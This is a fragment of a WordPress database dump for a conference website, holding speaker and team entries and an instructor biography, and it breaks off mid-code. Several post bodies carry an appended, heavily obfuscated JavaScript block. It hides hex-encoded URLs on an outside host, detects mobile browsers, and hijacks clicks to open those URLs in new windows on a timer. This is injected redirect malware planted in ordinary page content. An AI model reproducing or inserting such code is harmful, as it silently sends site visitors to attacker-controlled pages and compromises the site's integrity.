_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Kai-Wei Chiang','','publish','closed','closed','','kai-wei-chiang','','','2022-10-09 05:49:14','2022-10-09 05:49:14','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2527',0,'dt_team','',0),
(2528,1,'2022-10-07 19:01:53','2022-10-07 19:01:53','','1','','inherit','open','closed','','1-5','','','2022-10-07 19:01:53','2022-10-07 19:01:53','',2527,'https://gsw2023.com/wp-content/uploads/2022/10/1-4.jpg',0,'attachment','image/jpeg',0),
(2530,1,'2022-10-07 19:02:41','2022-10-07 19:02:41','','2','','inherit','open','closed','','2-3','','','2022-10-07 19:02:41','2022-10-07 19:02:41','',0,'https://gsw2023.com/wp-content/uploads/2022/10/2-2.jpg',0,'attachment','image/jpeg',0),
(2531,1,'2022-10-07 19:03:47','2022-10-07 19:03:47','<!-- wp:table -->\n<figure class=\"wp-block-table\"><table><tbody><tr><td>(WG I/8)</td></tr></tbody></table></figure>\n<!-- /wp:table -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Cheng Wang, Xiamen University, China','','publish','closed','closed','','cheng-wang-xiamen-university-china-wg-i-8','','','2022-12-06 05:31:51','2022-12-06 05:31:51','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2531',0,'dt_team','',0),
(2532,1,'2022-10-07 19:03:39','2022-10-07 19:03:39','','1','','inherit','open','closed','','1-6','','','2022-10-07 19:03:39','2022-10-07 19:03:39','',2531,'https://gsw2023.com/wp-content/uploads/2022/10/1-5.jpg',0,'attachment','image/jpeg',0),
(2533,1,'2022-10-07 19:04:16','2022-10-07 19:04:16','<!-- wp:cover {\"overlayColor\":\"accent\"} -->\n<div class=\"wp-block-cover\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-accent-background-color has-background-dim-100 has-background-dim\"></span><div class=\"wp-block-cover__inner-container\"><!-- wp:heading {\"level\":1} -->\n<h1>Instructor’s Bio</h1>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Dr. Habib is the Thomas A. Page professor of Civil Engineering at Purdue University and the Co-Director of the Civil Engineering Center for Applications of UAS for a Sustainable Environment (CE-CAUSE). He is also the Associate Director of Purdue University’s Joint Transportation Research Program (JTRP). Dr. Habib’s research interests span the fields of terrestrial and aerial mobile mapping systems. He has been focusing on modeling the perspective geometry of non-traditional imaging scanners, automatic matching and change detection, automatic calibration of low-cost digital cameras, object recognition in imagery and point cloud data, LiDAR mapping, and integrating photogrammetric data with other sensors/datasets (e.g., GNSS/INS, GIS databases, multi- and hyper-spectral sensors, and LiDAR). Over the last seven years, he has been involved in the development, integration, and utilization of wheel-based and UAV-based mobile mapping systems for a wide range of applications in precision agriculture, geometric documentation of transportation corridors, digital forestry, crash scene reconstruction, cultural heritage documentation, environmental management, and infrastructure monitoring.</p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:cover -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 